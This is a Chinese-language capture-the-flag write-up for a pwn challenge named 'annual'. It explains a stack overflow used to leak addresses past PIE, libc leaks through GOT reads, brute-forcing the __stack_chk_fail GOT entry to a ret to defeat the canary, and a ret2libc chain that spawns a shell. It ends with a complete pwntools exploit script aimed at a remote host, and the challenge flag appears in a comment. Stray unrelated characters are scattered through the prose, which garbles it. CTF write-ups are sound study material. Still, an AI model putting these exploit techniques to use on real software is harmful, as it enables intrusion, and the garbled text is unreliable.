思路概要
我解本題的思路大致如下:
- 用棧溢出leak全局變量地址,繞過PIE
- leak libc中函數(shù)的地址,根據(jù)低字節(jié)找到對(duì)應(yīng)的libc版本弃衍,同時(shí)得到libc地址
- 修改got表中__stack_chk_fail的地址使其指向一個(gè)ret指令。此處需要爆破
- 用棧溢出ret2libc
逆向
main函數(shù)調(diào)用了兩個(gè)函數(shù)。initialize里調(diào)用了srand(time(0))证鸥,將函數(shù)指針賦值給全局變量。接下來看main_0函數(shù):
通過菜單選項(xiàng)執(zhí)行函數(shù)勤晚。分別有:
- B)ye. 返回
- G)et more packet. person結(jié)構(gòu)體中的money指針指向的值加上一個(gè)模100的隨機(jī)數(shù)
- P)rint packet. 打印person->name和person->packets中所有指針?biāo)傅腜ackets信息
- R)ename. 重命名枉层,此處存在棧溢出
- S)how. 打印person->name和*person->money
Person和Packet結(jié)構(gòu)體是通過逆向分析得到的,如下:
翻譯成C語言就是
struct Packet
{
char message[0x100];
unsigned int sig;
unsigned int Money;
};
struct Person
{
char name[32];
unsigned int * pMoney;
struct Packet * packets[10];
};
Tips : IDA改名赐写,定義結(jié)構(gòu)體十分有助于逆向分析鸟蜡,弄清程序流程
Pwn
checksec。沒什么好說的挺邀,是個(gè)64位程序
繞過PIE
main_0函數(shù)中的pMoney指針(off=0x20)指向的是一個(gè)全局變量揉忘,可以通過寫入0x20個(gè)字符后打印名字來得到money全局變量的地址跳座,以算出bss段地址和got.plt表地址
leak libc
可以利用show函數(shù)打印*person.pMoney,通過棧溢出覆蓋該指針可以實(shí)現(xiàn)任意地址讀泣矛。將其覆蓋為got表地址可以泄露函數(shù)libc地址(由于show函數(shù)只會(huì)打印4字節(jié)的數(shù)據(jù)疲眷,因此每個(gè)地址要leak兩次),泄露兩個(gè)libc地址后就可以使用工具獲得相應(yīng)的libc您朽。之后計(jì)算出system函數(shù)和"/bin/sh"字符串的實(shí)際加載地址咪橙。
這里我使用了工具https://github.com/niklasb/libc-database,也可以使用pwntools的dynELF來實(shí)現(xiàn)虚倒。
覆蓋__stack_chk_fail的got表地址
這是本題中比較關(guān)鍵的一步美侦。因?yàn)樵诔绦蛑心軐懭我獾刂返暮瘮?shù)只有GetPacket,而修改 的值是一個(gè)隨機(jī)數(shù)魂奥,所以需要通過爆破找到值為0xc3(ret)的地址菠剩。
我們首先獲取__stack_chk_fail中存放的地址值scf_addr。此時(shí)__stack_chk_fail未綁定耻煤,因此該地址在用戶的地址空間中具壮。將person.pMoney覆蓋為__stack_chk_fail的got表地址。
調(diào)用GetPacket哈蝇,每次GetPacket后用rename將pMoney指針修改為scf_addr+money(當(dāng)前總金錢數(shù)) 棺妓,順便覆蓋person的packets數(shù)組首個(gè)元素為0(這樣才可以爆破多于10次)。然后使用show可以讀取got['__stack_chk_fail']中存放地址中的值炮赦,不為0xc3就重新執(zhí)行GetPacket怜跑。
money過大會(huì)使got['__stack_chk_fail']超出可執(zhí)行代碼范圍,一般2000以內(nèi)不行就可以重新爆破吠勘。最終可以使got['__stack_chk_fail']指向一條ret指令性芬,繞過cannary
ret2libc
使用ropper工具在libc中找到一個(gè)跳板pop rdi; ret;(原程序中雖然也有這個(gè)跳板,但是不可執(zhí)行) 計(jì)算該指令地址剧防。構(gòu)造棧幀如下:
| 寫入(buf) |
|---|
| 'a'*0xa8 |
| gaget -> pop rdi; ret; |
| binsh_addr -> "/bin/sh" |
| system_addr |
成功返回后難道shell植锉。
攻擊代碼
from pwn import *
#pwnhub{flag:H4ppy_N3w_year%^&*}
#io = process('./annual')
elf = ELF('./annual')
#libc = ELF('/lib/x86_64-linux-gnu/libc-2.26.so')
libc = ELF('./libc-2.23.so')
io = remote("52.80.154.150", 9999)
money = 0
def welcome(s):
io.sendafter('name!', s, timeout=5)
def getPacket(s):
global money
io.sendafter("B)ye\n", 'G')
io.recvuntil("$")
inc = int(io.recvuntil("\n")[:-1], 10)
io.sendafter("message!\n", s)
money += inc
return inc
def printPacket():
io.sendafter("B)ye\n", 'P')
return io.recvuntil("R)ename")[:-len("R)ename")]
def show():
io.sendafter("B)ye\n", 'S')
return io.recvuntil("R)ename")[:-len("R)ename")].split(' have $')
def rename(s):
io.sendafter("B)ye\n", 'R')
io.sendafter("name!", s)
def got(sym, bss_addr):
return elf.got[sym] + bss_addr - elf.bss()
def leakGot(sym, bss_addr):
item_got = got(sym, bss_addr)
payload = 'a' * 0x40 + p64(item_got)
rename(payload)
#payload = 'a' * 0x40 + p64(heap_addr)
#rename(payload)
low = int(show()[1], 10) & 0xffffffff
payload = 'a' * 0x40 + p64(item_got+4)
rename(payload)
high = int(show()[1], 10) & 0xffffffff
return low | (high << 32)
def main():
global money
welcome('L1nk')
# leak bss
payload1 = "a" * 0x20
rename(payload1)
money_addr = u64(show()[0][0x20:0x20+6].ljust(8, '\x00'))
bss_addr = money_addr - 0x4238 + 0x40e0
print "[+] Money addr:" + hex(money_addr)
# leak libc
srand_addr = leakGot("srand", bss_addr)
print "[+] srand addr:" + hex(srand_addr)
setbuf_addr = leakGot("setbuf", bss_addr)
print "[+] setbuf addr:" + hex(setbuf_addr)
#if True:
# offset_system = 0x0000000000045390
# offset_setbuf = 0x00000000000766b0
# offset_binsh = 0x00000000001190f0
# offset_scf = 0x00000000001190f0
#else:
offset_system = libc.symbols['system']
offset_setbuf = libc.symbols['setbuf']
offset_scf = libc.symbols['__stack_chk_fail']
offset_binsh = 0x18CD57
libc_addr = setbuf_addr - offset_setbuf
system_addr = libc_addr + offset_system
binsh_addr = offset_binsh + libc_addr
rename('\x00' * 0x40 + p64(got('__stack_chk_fail', bss_addr)))
low = int(show()[1], 10) & 0xffffffff
rename('\x00' * 0x40 + p64(got('__stack_chk_fail', bss_addr) + 4))
high = int(show()[1], 10) & 0xffffffff
scf_addr = low | high << 32
print "[+] __stack_chk_fail plt:" + hex(scf_addr)
print "[+] __stack_chk_fail plt:" + hex(elf.plt["__stack_chk_fail"] + bss_addr - elf.bss() + 60)
while True:
print money
rename('\x00'*0x40 + p64(got('__stack_chk_fail', bss_addr)) + '\x00' * 0x10)
getPacket('\x00')
rename('\x00'*0x40 + p64(scf_addr+money) + '\x00' * 0x10)
if int(show()[1]) & 0xff == 0xc3:
break
gadget = libc_addr + 0x21102
payload = 0xa8 * 'a' + p64(gadget) + p64(binsh_addr) + p64(system_addr)
rename(payload)
io.sendafter("B)ye\n", "B")
io.interactive()
if __name__ == "__main__":
main()
感謝zblee的邀請(qǐng)碼~
